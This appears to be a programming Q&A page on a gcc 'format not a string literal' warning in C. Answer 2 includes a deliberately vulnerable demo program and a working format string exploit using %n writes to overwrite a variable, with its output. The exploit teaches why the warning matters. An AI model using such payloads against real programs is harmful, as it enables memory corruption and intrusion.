c array - warning: format not a string literal

Question

I'm attempting to learn C and already I've run into an issue. I assume its trivial but I need to know it. I have written:

#include <stdio.h> #include <string.h>  int main()  {     char str_a[20];      strcpy(str_a, "Hello, world!\n");     printf(str_a); } 

Once I attempt to compile it with: gcc -g -o char_array2 char_array2.c I receive an error saying:

char_array2.c: In function ‘main’: char_array2.c:9:2: warning: format not a string literal and no format arguments [-Wformat-security] 

Can anyone help please?

Answer 1

When using printf, the format string is better be a string literal and not a variable:

printf("%s", str_a); 

Answer 2

Just to add something to other answers, you better do this because a (long?) time ago people wrote printf like that and hackers found a way to read from and write to the stack, more here.
For example, a simple program like this:

blackbear@blackbear-laptop:~$ cat format_vul.c #include <stdio.h> #include <stdlib.h> #include <string.h>  int main(int argc, char *argv[]) {     char text[1024];     static int test_var = -1;      if(argc < 2) {         printf("Use: %s <input>\n", argv[0]);         exit(-1);     }      strcpy(text, argv[1]);      printf("The correct way:\n");     printf("%s", text);      printf("\nThe wrong way:\n");     printf(text);      printf("\n[*]: test_var @ %8p = %d ( 0x%x )\n", &test_var, test_var, test_var); } blackbear@blackbear-laptop:~$ ./format_vul AAAA The correct way: AAAA The wrong way: AAAA [*]: test_var @ 0x804a024 = -1 ( 0xffffffff ) 

Can be used to change test_var's value from 0xffffff to something else, like 0xaabbccdd:

blackbear@blackbear-laptop:~$ ./format_vul $(printf "\x24\xa0\x04\x08JUNK\x2 5\xa0\x04\x08JUNK\x26\xa0\x04\x08JUNK\x27\xa0\x04\x08").%8x.%8x.%8x.%8x.%8x. %8x.%8x.%8x.%8x.%110x.%n%239x%n%239x%n%239x%n The correct way: $�JUNK%�JUNK&�JUNK'�.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%110x.%n%239x%n%239 x%n%239x%n The wrong way: $�JUNK%�JUNK&�JUNK'�.bfffefec.  154d7c.  155d7c.  155d7c.      f0.      f0.b ffff4a4.       4.       4.                                                                                                        174.                                                                      50415243                                                                      50415243                                                                      50415243 [*]: test_var @ 0x804a024 = -1430532899 ( 0xaabbccdd )